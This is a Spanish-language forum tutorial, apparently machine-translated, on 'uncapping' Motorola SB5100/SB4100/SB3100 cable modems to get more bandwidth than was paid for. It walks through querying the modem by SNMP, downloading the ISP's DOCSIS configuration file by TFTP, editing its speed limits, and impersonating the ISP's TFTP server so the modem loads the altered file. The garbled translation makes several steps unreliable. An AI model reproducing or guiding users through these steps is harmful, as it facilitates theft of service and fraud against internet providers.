                     *                                                                                            *
                     *****************************************************

 
La mayoría de nosotros consideramos que la velocidad de navegación que se asigna a los ISP no es suficiente. 64 kbps con la gente pensaría que sería cool velocidad de 128Kbps. 128Kbps con la gente pensará 256Kbps será frío y así sucesivamente

Este tutorial te enseñará cómo aumentar su enlace 64Kbps a 512Kbps o lo que la velocidad que desee.

Es muy posible hacer esto. Con un poco de suerte si el cable del proveedor de servicios Internet de manera bárbara acerca de cómo esta nueva tecnología es muy exitoso y dejó algunas lagunas clave abierta para capturar información importante acerca de cómo realizar esta tarea. Sin embargo, este tutorial no le garantizará el éxito del 100%.

Comencemos. Voy a tratar de explicar que lo mejor que puedo hacer para volver a configurar el SB5100, SB4100 o módem de cable SB3100

Teoría de módem de cable para trabajar

Todos los módem de cable en el arranque buscará la imagen de un "archivo" en el que hacer toda la configuración de límite de carga y velocidad de descarga es el límite de velocidad está establecido. Este "archivo de imagen almacenado" en el ISP `s servidor TFTP. Módem se puede configurar con pre-ISP `s dirección IP del servidor TFTP y el nombre del archivo de imagen para ser descargados. Si el módem está arrancando el servidor y la solicitud de TFTP para descargar un archivo de imagen desde el servidor TFTP está de acuerdo con este límite de velocidad que habíamos establecido.

Nuestra Misión

Esta imagen recibió un archivo de ISP `s servidor TFTP, volver a configurar de acuerdo a nuestra necesidad y la fuerza de nuestro módem para descargar este archivo desde su ordenador en lugar de descargarlo desde el ISP` s servidor TFTP.

Los pasos para completar

1). Módem USB para obtener la dirección MAC
2). Su ISP para obtener la dirección IP del servidor TFTP
3). Obtener el nombre y la ruta del archivo de "configuración o archivos de imagen almacenados en el ISP` s servidor TFTP.
4). Descargar archivo de imagen de ISP `s servidor TFTP.
5). Descifrar con archivos de imágenes que ha descargado desde ISP `s servidor TFTP
6). Modificación de archivos de imagen
7). Cifre los archivos de imagen modificada
8). Modificación de la configuración de su ordenador TCP mismo ISP `s servidor TFTP (es decir, la misma dirección IP como ISP` s servidor TFTP)
9). De host del servidor TFTP en su ordenador
10). Ponga los archivos de imagen en un directorio de su base de TFTP
11). Reinicie el módem
12). Cambiador de IP del PC de nuevo dado por ISP
13). Hecho OOPS. Empezar a navegar con una velocidad de nuevo


1). Módem USB para obtener la dirección MAC

Usted puede ver la parte posterior del módem para obtener esta dirección MAC o puede iniciar sesión en el módem de cable con Web Browser hxxp: / / 192.168.100.1 /. Esta es la interna de las páginas HTML se almacenan cable módem DOCSIS (SB5100, SB4100 y SB3100) que le da más información acerca de la configuración importantes. Menos que esté desactivado por su ISP. Esta característica podría ser totalmente apagado por su ISP.

2). Su ISP para obtener la dirección IP del servidor TFTP
[color = # FF0000] 3). Obtener el nombre y la ruta del archivo de "configuración o archivos de imagen almacenados en el ISP` s servidor TFTP.

Para obtener esta información importante que necesita para hacer que su módem simples del SNMP. Para ello puede utilizar una de las herramientas a continuación

a) Existe un programa llamado "Weird query.exe de solución de paquete de solicitud BOOTP programa que le dirá todo lo que necesita saber, sin todos estos pasos adicionales. Se mostrará el archivo de imagen, la dirección del servidor de TFTP, lo único que necesitas para empezar. Para utilizar esta herramienta BOOTP consulta, es necesario la dirección MAC del cable módem

O

Los expertos pueden utilizar Solarwinds programa SNMP

O

c) Los principiantes pueden usar DOCSIS utilidad de diagnóstico

O

d) Los principiantes pueden usar el snmpwalk

usar el comando "snmpwalk 192.168.100.1 público"

NOTA: Utilice la dirección IP del módem como "192.168.100.1" (SB5100, SB4100 y SB3100) cuando le preguntaron si por uno de los instrumentos mencionados. De comunidad SNMP "General"

Uso de las herramientas encima de usted recibirá información de los ISP `s IP del servidor TFTP y el nombre de archivo de imagen" almacenada en el servidor TFTP
Toda la información importante almacenada en este archivo, que se convirtió en uno de MaxRateDown 2621440; MaxRateUp 393.216;. (Esta fue la configuración de mi ISP. Usted puede ver que las velocidades similares a lo que estaba recibiendo. 40KB / s de subida y 250 KB / s de bajada)

Entre estos, lo que necesitamos es:
Configurando el servidor TFTP = 194 .*.*.. 90 (sustituir este con la suya en todo doc)
= El archivo de configuración de Isrr.bin nombre (sustituir con lo que usted desea mientras este en el doc)
Y
Fragmentos IP creado = 0
Address.10.xxx.xxx.xxx IP = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Address.192.168.100.1 IP = 192.168.100.1 (dirección IP del módem de cable, (sustituir esto con la suya en todo doc)
IP-a-Si-index.10.xxx.xxx.xxx = 2

Consejo: Usted puede hacer este paso por inhalación, es decir módem "192.168.100.1" cuando las botas para módem. Nunca he intentado este método. Pruebe suerte.


4). Descargar archivo de imagen de ISP `s servidor TFTP.

Para ello puede utilizar el símbolo del sistema y el comando a continuación con las comillas y paréntesis.


"C: \ tftp-i GET"

Bueno ahora usted tiene un archivo de imagen de ISP `s servidor TFTP.


5). Descifrar con archivos de imágenes que ha descargado desde ISP `s servidor TFTP
6). Modificación de archivos de imagen
7). Cifre los archivos de imagen modificada

DOCSIS utiliza una herramienta que puede descargar de
CODEhttp: / / No tienes permitido ver los links. Registrarse o Entrar a mi cuenta / projects / DOCSIS

de utilizar este programa usted puede descifrar la imagen de archivo cambiar la velocidad de carga y la velocidad de descargar, guardar y encriptar la espalda. Cambie el nombre de la recién creada mismo archivo como sus archivos de imagen original.


8). Modificación de la configuración de su ordenador TCP mismo ISP `s servidor TFTP (es decir, la misma dirección IP como ISP` s servidor TFTP)

Vaya a Mis sitios de red y haga clic derecho -> Propiedades de
Seleccione LAN Card, haga clic derecho -> Propiedades-> Protocolo Internet (TCP-IP), haga doble clic y el cambio a los valores de la siguiente manera
TPC de configurar los siguientes valores de TCP
IP: 194 .*.*. 90 (sustituir con el servidor TFTP desde el ISP)
Máscara: 255.255.255.0
Puerta de enlace: 192.168.100.1 (sustituir con una dirección IP de módem de cable)

Nota: La puerta de entrada a 192.168.100.1 entonces sólo el módem puede comunicarse con el ordenador.


9). De host del servidor TFTP en su ordenador
10). Ponga los archivos de imagen en un directorio de su base de TFTP
11). Reinicie el módem

Descargar el software de servidor TFTP y el host del servidor TFTP en su ordenador
Usted puede descargar desde el servidor TFTP:
CODEftp: / / No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

TFTPD32 iniciar el servidor. Ir a Ajustes y establecer la seguridad en Ninguno. Aumentar el tiempo de espera a 20 seg y la retransmisión máximo a 6. Optó por traducir el archivo de UNIX. Asegúrese de que el directorio de base para colocar isrr.bin es (por ejemplo, archivos de imagen se cambiará). Si usted necesita para reproducir una ruta de acceso de directorio junto con el archivo de imagen, a continuación, cree un directorio raíz de la correspondiente ruta de las imágenes de archivo.

Reinicie el módem, y tan pronto como la luz ENVIAR funcionamiento sólido, verá aparecer el servidor TFTP, es decir, su PC


12). Cambiador de IP del PC de nuevo dado por ISP
13). Hecho OOPS. Empezar a navegar con una velocidad de nuevo

Ahora cambie la configuración de la PC de nuevo a normal de TCP proporcionada por su ISP. (Es decir Ponga su dirección IP y puerta de entrada original)

¡Uy que hackeado su módem. Prueba de descarga de algunos archivos con la pesca (acelerador de descargas más)

Nota: Esta tasa se mantendrá igual hasta que reinicie su módem de cable. Así que cada vez que reinicie el módem, debe seguir los pasos 8,9,10,11 y 12 \

espero que les alla gustado,  Saludos  **..::KeY-M0rT::..**